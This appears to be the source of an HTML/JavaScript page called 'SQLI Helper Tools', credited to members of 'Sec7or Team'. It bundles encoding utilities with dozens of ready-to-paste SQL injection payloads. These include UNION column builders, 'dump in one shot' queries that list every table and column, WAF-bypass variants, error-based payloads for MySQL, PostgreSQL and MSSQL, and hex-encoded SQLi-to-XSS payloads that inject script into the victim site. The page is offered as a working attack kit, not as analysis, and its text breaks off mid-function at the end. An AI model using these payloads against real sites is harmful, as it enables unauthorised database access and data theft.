[SQL] Helper Tools

1. <html>
2. <head>
3. <title>SQLI Helper Tools</title>
4. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
5. <meta content='index, follow' name='googlebot'/>
6. <meta content='all' name='spiders'/>
7. <meta content='all' name='WEBCRAWLERS'/>
8. <meta content='Index, Follow' name='robots'/>
9. <meta content='Versailles' name='author'/>
10. <meta content='Sec7or Team' name='author'/>
11.  
12. <style>
13. body { padding-top: 60px; background: url(https://cdn.allwallpaper.in/wallpapers/1600x900/15604/swords-sword-art-online-kirigaya-kazuto-kirito-1600x900-wallpaper.jpg) top center no-repeat;
14. background-attachment:fixed;
15. }
16. </style>
17.  
18. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css"> <script src="http://code.jquery.com/jquery-2.1.3.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/js/bootstrap.min.js"></script>
19.  
20.  
21.  
22.  
23. <script type="text/javascript">
24.  
25. // CheatSheet Dios Collection Pakage
26. // By Versailles
27. // FB : facebook.com/thever.sevenfoldism
28. // Dont Change Copyright
29. // Recoded by : T3754K1T1
30. // Thanks to Versailles from Sec7or Team
31.  
32.  
33. function rplc(){
34.  
35. function replaceAll(str, find, replace) { return str.replace(new RegExp(find, 'g'), replace); }
36.  
37. var str = document.getElementById('str').value;
38. var wrd = document.getElementById('wrd').value;
39. var rep = document.getElementById('rep').value;
40.  
41. hasil = replaceAll(str,wrd,rep);
42. document.getElementById('hex').value = hasil;
43.  
44. }
45.  
46.  
47. var encN=1;
48. function decodeTxt(s){
49. var s1=unescape(s.substr(0,s.length-1));
50. var t='';
51. for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
52. return unescape(t);
53. }
54.  
55. function encodeTxt(s){
56. s=escape(s);
57. var ta=new Array();
58. for(i=0;i<s.length;i++)ta[i]=s.charCodeAt(i)+encN;
59. return ""+escape(eval("String.fromCharCode("+ta+")"))+encN;
60. }
61.  
62. function escapeTxt(os){
63. var ns='';
64. var t;
65. var chr='';
66. var cc='';
67. var tn='';
68. for(i=0;i<256;i++){
69. tn=i.toString(16);
70. if(tn.length<2)tn="0"+tn;
71. cc+=tn;
72. chr+=unescape('%'+tn);
73. }
74. cc=cc.toUpperCase();
75. os.replace(String.fromCharCode(13)+'',"%13");
76. for(q=0;q<os.length;q++){
77. t=os.substr(q,1);
78. for(i=0;i<chr.length;i++){
79. if(t==chr.substr(i,1)){
80. t=t.replace(chr.substr(i,1),"%"+cc.substr(i*2,2));
81. i=chr.length;
82. }}
83. ns+=t;
84. }
85. return ns;
86. }
87. function unescapeTxt(s){
88. return unescape(s);
89. }
90. function wF(s){
91. document.write(decodeTxt(s));
92. }
93.  
94. function esc(){
95. var str = document.getElementById('str').value;
96. hasil = escapeTxt(str);
97. document.getElementById('hex').value = hasil;
98. }
99.  
100.  
101. function unesc(){
102. var str = document.getElementById('str').value;
103. hasil = unescapeTxt(str);
104. document.getElementById('hex').value = hasil;
105. }
106.  
107. var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
108. var base64DecodeChars = new Array(
109. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
110. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
111. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
112. 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
113. -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
114. 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
115. -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
116. 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
117.  
118. function base64encode(str) {
119. var out, i, len;
120. var c1, c2, c3;
121.  
122. len = str.length;
123. i = 0;
124. out = "";
125. while(i < len) {
126. c1 = str.charCodeAt(i++) & 0xff;
127. if(i == len)
128. {
129. out += base64EncodeChars.charAt(c1 >> 2);
130. out += base64EncodeChars.charAt((c1 & 0x3) << 4);
131. out += "==";
132. break;
133. }
134. c2 = str.charCodeAt(i++);
135. if(i == len)
136. {
137. out += base64EncodeChars.charAt(c1 >> 2);
138. out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
139. out += base64EncodeChars.charAt((c2 & 0xF) << 2);
140. out += "=";
141. break;
142. }
143. c3 = str.charCodeAt(i++);
144. out += base64EncodeChars.charAt(c1 >> 2);
145. out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
146. out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
147. out += base64EncodeChars.charAt(c3 & 0x3F);
148. }
149. return out;
150. }
151.  
152. function base64decode(str) {
153. var c1, c2, c3, c4;
154. var i, len, out;
155.  
156. len = str.length;
157. i = 0;
158. out = "";
159. while(i < len) {
160. /* c1 */
161. do {
162. c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
163. } while(i < len && c1 == -1);
164. if(c1 == -1)
165. break;
166.  
167. /* c2 */
168. do {
169. c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
170. } while(i < len && c2 == -1);
171. if(c2 == -1)
172. break;
173.  
174. out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
175.  
176. /* c3 */
177. do {
178. c3 = str.charCodeAt(i++) & 0xff;
179. if(c3 == 61)
180. return out;
181. c3 = base64DecodeChars[c3];
182. } while(i < len && c3 == -1);
183. if(c3 == -1)
184. break;
185.  
186. out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
187.  
188. /* c4 */
189. do {
190. c4 = str.charCodeAt(i++) & 0xff;
191. if(c4 == 61)
192. return out;
193. c4 = base64DecodeChars[c4];
194. } while(i < len && c4 == -1);
195. if(c4 == -1)
196. break;
197. out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
198. }
199. return out;
200. }
201.  
202. function utf16to8(str) {
203. var out, i, len, c;
204.  
205. out = "";
206. len = str.length;
207. for(i = 0; i < len; i++) {
208. c = str.charCodeAt(i);
209. if ((c >= 0x0001) && (c <= 0x007F)) {
210. out += str.charAt(i);
211. } else if (c > 0x07FF) {
212. out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
213. out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
214. out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
215. } else {
216. out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
217. out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
218. }
219. }
220. return out;
221. }
222.  
223. function utf8to16(str) {
224. var out, i, len, c;
225. var char2, char3;
226.  
227. out = "";
228. len = str.length;
229. i = 0;
230. while(i < len) {
231. c = str.charCodeAt(i++);
232. switch(c >> 4)
233. {
234. case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
235. // 0xxxxxxx
236. out += str.charAt(i-1);
237. break;
238. case 12: case 13:
239. // 110x xxxx 10xx xxxx
240. char2 = str.charCodeAt(i++);
241. out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
242. break;
243. case 14:
244. // 1110 xxxx 10xx xxxx 10xx xxxx
245. char2 = str.charCodeAt(i++);
246. char3 = str.charCodeAt(i++);
247. out += String.fromCharCode(((c & 0x0F) << 12) |
248. ((char2 & 0x3F) << 6) |
249. ((char3 & 0x3F) << 0));
250. break;
251. }
252. }
253.  
254. return out;
255. }
256.  
257. function CharToHex(str) {
258. var out, i, len, c, h;
259.  
260. out = "";
261. len = str.length;
262. i = 0;
263. while(i < len)
264. {
265. c = str.charCodeAt(i++);
266. h = c.toString(16);
267. if(h.length < 2)
268. h = "0" + h;
269.  
270. out += "\\x" + h + " ";
271. if(i > 0 && i % 8 == 0)
272. out += "\r\n";
273. }
274.  
275. return out;
276. }
277.  
278. function b64_enc() {
279. var str = document.getElementById('str').value;
280. document.getElementById('hex').value = base64encode(utf16to8(str));
281. }
282.  
283. function b64_dec() {
284. var str = document.getElementById('str').value;
285. var opts = "checked";
286.  
287. if(opts.checked)
288. {
289. document.getElementById('hex').value = CharToHex(base64decode(str));
290. }
291. else
292. {
293. document.getElementById('hex').value = utf8to16(base64decode(str));
294. }
295. }
296.  
297.  
298.  
299. function d2h(d) {return d.toString(16);}
300. function Str2Hex() {
301. var tmp = document.getElementById('str').value;
302. var str = '';
303. for (var i=0; i<tmp.length; i++) {
304. c = tmp.charCodeAt(i);
305. str += d2h(c) + ''; }
306. document.getElementById('hex').value = str; }
307.  
308. function h2d(h) {
309. return parseInt( h, 16 ); }
310. function Hex2Str(){
311. var string = document.getElementById('str').value;
312. var string = string.toLowerCase();
313. string = string.replace( /%/g, '' );
314. string = string.replace( /[^0-9abcdefg]/g, '' );
315.  
316. var charStringArray = new Array();
317. var buffer = '';
318. var hasil = '';
319. for ( var c = 0 ; c < string.length ; c++ ) {
320. buffer += string.charAt( c ).toString();
321. if ( buffer.length >= 2 ) {
322. hasil += String.fromCharCode( h2d( buffer ) );
323. buffer = '';
324. }
325. }
326. document.getElementById('hex').value = hasil;
327. }
328.  
329.  
330.  
331. function kolom() {
332.  
333. var columns = prompt( "Total Columns ?", "48" );
334. columns = Math.min(1000, parseInt( columns ));
335. var colArray = new Array();
336. for ( var i = 0 ; i < columns ; i++ ) {
337. colArray.push( i+1 );
338. }
339. var kolom = "+UNION+SELECT+" + colArray.join( ',' ); document.getElementById('dios').value = kolom;
340. }
341.  
342. function dios1(){
343. var dios1 = '(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)';
344. document.getElementById('dios').value = dios1;
345. }
346.  
347. function dios2(){
348. var dios2 = '(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))';
349. document.getElementById('dios').value = dios2;
350. }
351.  
352. function dios3(){
353. var dios3 = 'make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)';
354. document.getElementById('dios').value = dios3;
355. }
356.  
357. function dios4(){
358. var dios4 = "export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2)";
359. document.getElementById('dios').value = dios4;
360. }
361.  
362.  
363. function xssdios(){
364. var xssdios = 'concat(0x3c2f6469763e3c7363726970743e616c6572742827,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)';
365. document.getElementById('dios').value = xssdios;
366. }
367.  
368.  
369. function makman(){
370. var makman = alert("SQLIGODS SYNTAX V 1.0 \n\nBY MAKMAN");
371. var makman = "concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)";
372. document.getElementById('dios').value = makman;
373. }
374.  
375. function trjn(){
376. var trjn = 'concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e,if((@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,2,0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/';
377. document.getElementById('dios').value = trjn;
378. }
379.  
380. function trjnx(){
381. var trjnx = "concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)";
382. document.getElementById('dios').value = trjnx;
383. }
384.  
385. function bypsfrm(){
386. var bypsfrm = alert("Put after parameter id , and Replace Vuln Column With @sec7or");
387. var bypsfrm = '+and@sec7or:=concat(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x203a3a20,column_name)),@)+/*!50000UNION*/+SELECT+';
388. document.getElementById('dios').value = bypsfrm;
389. }
390.  
391. function ebf(){
392. var ebf = "(SELECT!x-~0.FROM(SELECT(concat_ws(0x3a3a,user(),@@version,database(),concat(@:=0,(Select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@)))x)a)";
393. document.getElementById('dios').value = ebf;
394. }
395.  
396. function poligon(){
397. var poligon = "polygon((Select*from((SELECT(!x-~0)FROM(SELECT(concat_ws(0x203a3a20,user(),@@version,database(),(Select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())))x)a)b)))";
398. document.getElementById('dios').value = poligon;
399. }
400.  
401. function multipoint(){
402. var multipoint = alert("It is only for mysql < 5.5 \n\nHow To Use\n\n1.remove parameter id and change it with the query \nif there s still any table that doesnt show completely just increase the limit ,number 20 in limit 1,20 is our assumption how many tables there in the site..\n\nM@db100d");
403. var multipoint = "multipoint((select*from(select!x-~0.from(select(select+group_concat(table_name+separator+0x0b)from(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+1,20)c)x)j)h))";
404. document.getElementById('dios').value = multipoint;
405. }
406.  
407. function postgre(){
408. var postgre = "(select+string_agg(concat(table_name,'::',column_name),$$<li>$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$))";
409. document.getElementById('dios').value = postgre;
410. }
411.  
412. function mssql(){
413. var mssql = "(select+concat('',table_name,'::',column_name)from+information_schema.columns+for+xml+path(''))";
414. document.getElementById('dios').value = mssql;
415. }
416.  
417. function bof(){
418. var bof = "+and(SELECT+1)=(SELECT+0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)/*!50000UNION*/SELECT+";
419. document.getElementById('dios').value = bof;
420.  
421. }
422.  
423.  
424. function version1(){
425. var v1 = 'version()';
426. document.getElementById('dios').value = v1;
427. }
428.  
429. function version2(){
430. var v2 = '@@version';
431. document.getElementById('dios').value = v2;
432. }
433.  
434. function version3(){
435. var v3 = '@@GLOBAL.VERSION';
436. document.getElementById('dios').value = v3;
437. }
438.  
439. function version4(){
440. var v4 = "(select+variable_value+from+information_schema.session_variables+where+variable_name+like+0x56455253494f4e)";
441. document.getElementById('dios').value = v4;
442. }
443.  
444. function version5(){
445. var v5 = "(Select+variable_value+from+information_schema.global_variables+where+variable_name=0x76657273696f6e)";
446. document.getElementById('dios').value = v5;
447. }
448.  
449. function user1(){
450. var u1 = 'user()';
451. document.getElementById('dios').value = u1;
452. }
453.  
454. function user2(){
455. var u2 = 'CURRENT_USER()';
456. document.getElementById('dios').value = u2;
457. }
458.  
459. function user3(){
460. var u3 = 'SYSTEM_USER()';
461. document.getElementById('dios').value = u3;
462. }
463.  
464. function user4(){
465. var u4 = 'SESSION_USER()';
466. document.getElementById('dios').value = u4;
467. }
468.  
469. function user5(){
470. var u5 = 'SUBSTRING_INDEX(USER(),0x40,1)';
471. document.getElementById('dios').value = u5;
472. }
473.  
474. function user6(){
475. var u6 = '(SELECT+CONCAT(USER)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
476. document.getElementById('dios').value = u6;
477. }
478.  
479. function db1(){
480. var d1 = 'DATABASE()';
481. document.getElementById('dios').value = d1;
482. }
483.  
484. function db2(){
485. var d2 = 'SCHEMA()';
486. document.getElementById('dios').value = d2;
487. }
488.  
489. function db3(){
490. var d3 = '(SELECT+CONCAT(DB)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
491. document.getElementById('dios').value = d3;
492. }
493.  
494. function o1(){
495. var o1 = '@@HOSTNAME';
496. document.getElementById('dios').value = o1;
497. }
498.  
499. function o2(){
500. var o2 = '@@VERSION_COMPILE_MACHINE';
501. document.getElementById('dios').value = o2;
502. }
503.  
504. function o3(){
505. var o3 = '@@VERSION_COMPILE_OS';
506. document.getElementById('dios').value = o3;
507. }
508.  
509. function o4(){
510. var o4 = '@@BASEDIR';
511. document.getElementById('dios').value = o4;
512. }
513.  
514. function o5(){
515. var o5 = '@@HAVE_OPENSSL';
516. document.getElementById('dios').value = o5;
517. }
518.  
519. function o6(){
520. var o6 = '@@HAVE_SYMLINK';
521. document.getElementById('dios').value = o6;
522. }
523.  
524. function o7(){
525. var o7 = '@@PORT';
526. document.getElementById('dios').value = o7;
527. }
528.  
529. function o8(){
530. var o8 = '@@SOCKET';
531. document.getElementById('dios').value = o8;
532. }
533.  
534. function xssqli(){
535. var xssqli = prompt('Input Your Query','VERSION()');
536. var xssqli = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,"+xssqli+",0x27293c2f7363726970743e)";
537. document.getElementById('dios').value = xssqli;
538. }
539.  
540. function mydios(){
541. var mydios = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,0x496e6a6563746564204279205665727361696c6c65735c6e5c6e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d5c6e,0x55736572203e3e20,USER(),0x5c6e,0x44426e616d65203e3e20,DATABASE(),0x5c6e5c6e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d5c6e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d5c6e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d5c6e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)";
542. document.getElementById('dios').value = mydios;
543. }
544.  
545. function mydios2(){
546. var mydios2 = "concat(0x496e6a6563746564204279205665727361696c6c65733c62723e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d3c62723e,0x55736572203e3e20,USER(),0x3c62723e,0x44426e616d65203e3e20,DATABASE(),0x3c62723e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d3c62723e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d3c62723e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d3c62723e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x))";
547. document.getElementById('dios').value = mydios2;
548. }
549.  
550. function hx(){
551. var hx = prompt('Input Your Query','VERSION()');
552. var hx = "hex(unhex("+hx+"))";
